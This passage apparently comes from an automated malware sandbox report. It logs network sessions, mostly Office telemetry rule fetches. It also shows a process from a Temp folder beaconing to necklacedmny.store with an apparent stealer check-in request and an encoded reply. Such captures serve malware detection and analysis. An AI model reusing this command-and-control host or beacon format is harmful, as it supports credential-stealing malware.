                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=dm3sck6evsjl5jvbtckm3se1nr; expires=Wed, 26-Feb-2025 00:02:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLBov2nMYNggcvmXepjHJKLP0yHYFUyAUHe25hOS12OmvIhbCC9JzP8m4ErQe5gmEiXAp7M%2BP6yg3Gzsvs70rInH1%2BAqogdhX%2BJeOQ%2FsQ87T8CEi1rsQJFY9dzRKB9KzYvnpCK4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8dc1fec3fb8b4797-DFW
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=2696461&cwnd=251&unsent_bytes=0&cid=61520665ac536728&ts=641&x=0"
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              133192.168.2.46385513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:20 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1406
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                                              x-ms-request-id: 418c36ca-101e-008d-6d09-2c92e5000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061620Z-16dc884887btswlthC1DFWs7xw00000001ng00000000cgqd
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              134192.168.2.46385713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:20 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1369
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                                              x-ms-request-id: 44d511d9-701e-000d-2909-2c6de3000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061620Z-16ccfc49897d4xzbhC1DFWg2yn00000001kg000000005015
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              135192.168.2.46385913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:20 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1377
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                                                                                              x-ms-request-id: 87019636-c01e-0082-15c7-2caf72000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061620Z-16ccfc4989744mtmhC1DFWr0ts00000001w0000000002k72
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              136192.168.2.46386013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:20 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE0A2434F"
                                                                                                                                                                                                                                              x-ms-request-id: faaa9be4-901e-002a-2d09-2c7a27000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061620Z-16ccfc49897wvnbhhC1DFWtfnn00000001n0000000006nfp
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              137192.168.2.46385813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:20 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1414
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                                              x-ms-request-id: 20927b1b-001e-008d-724e-2cd91e000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061620Z-r159446fcd75kr2xhC1DFWqn5c00000001bg0000000036ve
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              138192.168.2.46386113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:21 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE54CA33F"
                                                                                                                                                                                                                                              x-ms-request-id: 1d414214-201e-0003-4d32-2cf85a000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061621Z-16ccfc49897wlhjjhC1DFWsx6c00000001pg0000000079hs
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              139192.168.2.463867188.114.96.34431236C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 52
                                                                                                                                                                                                                                              Host: necklacedmny.store
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:21 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=422ccmadqi71q7fumj7vesr7oe; expires=Wed, 26-Feb-2025 00:03:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FLBbNDXKsVmTFyL0%2FBFMR9ZnfiwIpbMJ3VvEolIImKd2TkxL7q%2FX78WvgFPtzbrMarcIpAgd8TlQfLgw%2B%2BZJQVHXBtceTB3UohfncmuSev4eFReucIVmVeKDfPS8ti2N4K8Qi3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8dc1fecd783aa924-DFW
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=1821383&cwnd=201&unsent_bytes=0&cid=f44266afb4fcc30b&ts=706&x=0"
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC352INData Raw: 34 65 30 0d 0a 50 77 52 64 50 6d 55 56 4f 4a 7a 6d 6d 66 57 39 77 75 64 48 68 63 2f 72 6f 5a 4e 59 79 48 2b 2f 68 67 62 57 66 4a 56 30 7a 49 74 45 4a 69 73 63 58 79 45 55 76 70 58 38 31 34 65 32 6c 54 4c 67 34 38 6e 41 39 33 72 79 47 64 37 71 64 62 4e 51 74 77 4b 68 71 51 56 69 50 46 49 57 63 42 53 2b 67 2b 48 58 68 35 6d 63 5a 65 43 68 79 5a 75 78 50 61 49 64 33 75 70 6b 74 78 66 36 42 4b 44 6f 56 32 67 36 56 67 42 32 58 50 32 4b 39 4a 44 59 70 34 59 74 36 36 61 47 79 66 35 36 35 46 33 61 2f 43 54 73 58 74 67 52 75 4f 70 79 5a 53 35 56 52 32 67 55 35 38 54 38 6d 35 2f 34 78 53 62 67 72 59 66 48 39 7a 4f 67 46 39 66 69 5a 62 49 57 35 52 32 71 34 31 64 6d 4f 56 63 4b 66 30 6a 77 67 50 4f 62 33 71 32 47 5a 61 6e 74 6a 74 75 78 59 75 70 4f 37 2b 64 31 70 51
                                                                                                                                                                                                                                              Data Ascii: 4e0PwRdPmUVOJzmmfW9wudHhc/roZNYyH+/hgbWfJV0zItEJiscXyEUvpX814e2lTLg48nA93ryGd7qdbNQtwKhqQViPFIWcBS+g+HXh5mcZeChyZuxPaId3upktxf6BKDoV2g6VgB2XP2K9JDYp4Yt66aGyf565F3a/CTsXtgRuOpyZS5VR2gU58T8m5/4xSbgrYfH9zOgF9fiZbIW5R2q41dmOVcKf0jwgPOb3q2GZantjtuxYupO7+d1pQ
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC903INData Raw: 47 65 6c 72 73 6a 50 43 63 32 72 4b 4f 4c 4f 71 67 69 63 37 37 4e 61 6b 64 32 75 35 75 75 78 54 7a 47 36 50 76 58 57 5a 2f 45 6b 64 77 51 72 37 63 75 37 54 61 73 49 49 70 38 65 2b 7a 67 2b 35 30 73 31 33 61 36 43 54 73 58 76 38 54 72 65 70 57 61 54 78 55 44 47 56 61 37 49 4c 32 6b 73 32 6d 67 43 76 74 72 70 76 4a 2f 7a 79 70 46 4e 62 74 59 62 4d 61 74 31 6a 75 37 6b 55 6d 5a 78 77 6d 65 6c 48 79 6a 75 79 58 6e 37 2f 4c 50 4b 65 71 68 59 4f 70 65 71 34 63 32 65 56 67 75 68 44 7a 47 71 6a 6e 55 47 6b 35 56 67 64 77 55 50 61 4d 2b 70 72 55 72 34 55 67 36 71 6d 50 7a 2f 41 2f 36 6c 4f 64 34 33 7a 30 52 72 63 34 71 65 70 50 4a 41 70 66 43 58 6c 64 36 4d 54 6b 32 63 62 67 67 69 6d 6e 39 63 6e 4e 39 44 57 34 48 4d 2f 68 61 71 59 53 38 68 43 6a 36 6c 4e 6d 4f 6c
                                                                                                                                                                                                                                              Data Ascii: GelrsjPCc2rKOLOqgic77Nakd2u5uuxTzG6PvXWZ/EkdwQr7cu7TasIIp8e+zg+50s13a6CTsXv8TrepWaTxUDGVa7IL2ks2mgCvtrpvJ/zypFNbtYbMat1ju7kUmZxwmelHyjuyXn7/LPKeqhYOpeq4c2eVguhDzGqjnUGk5VgdwUPaM+prUr4Ug6qmPz/A/6lOd43z0Rrc4qepPJApfCXld6MTk2cbggimn9cnN9DW4HM/haqYS8hCj6lNmOl
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1369INData Raw: 33 66 38 63 0d 0a 6a 66 4b 46 31 61 79 4c 4e 2b 71 6e 6a 4d 33 39 50 36 55 64 33 4f 56 71 76 68 57 33 57 4f 37 75 52 53 5a 6e 48 43 68 36 53 75 79 4f 38 49 61 64 6c 59 59 72 36 61 71 66 67 2b 35 30 73 31 33 61 36 43 54 73 58 76 77 51 6f 75 56 64 59 43 31 53 43 47 56 51 37 49 44 31 6b 39 4f 75 6a 43 6a 6f 71 4a 76 48 38 53 69 72 47 4e 72 71 61 61 59 62 74 31 6a 75 37 6b 55 6d 5a 78 77 39 51 31 33 75 6c 66 7a 56 36 71 4f 4c 4b 2b 43 37 79 64 79 2f 49 2b 6f 61 30 61 51 38 39 42 33 37 47 36 66 73 55 6e 51 31 55 41 5a 6c 58 66 65 4e 38 5a 62 52 72 34 34 70 34 72 2b 43 7a 50 6b 31 71 78 44 51 37 32 43 30 58 72 6c 57 71 66 45 64 50 6e 39 39 43 6e 68 49 2f 5a 57 35 6f 74 79 75 69 79 4c 78 37 5a 61 4e 36 48 71 74 45 5a 32 38 4a 4c 55 53 2b 78 65 68 37 31 64 75 50
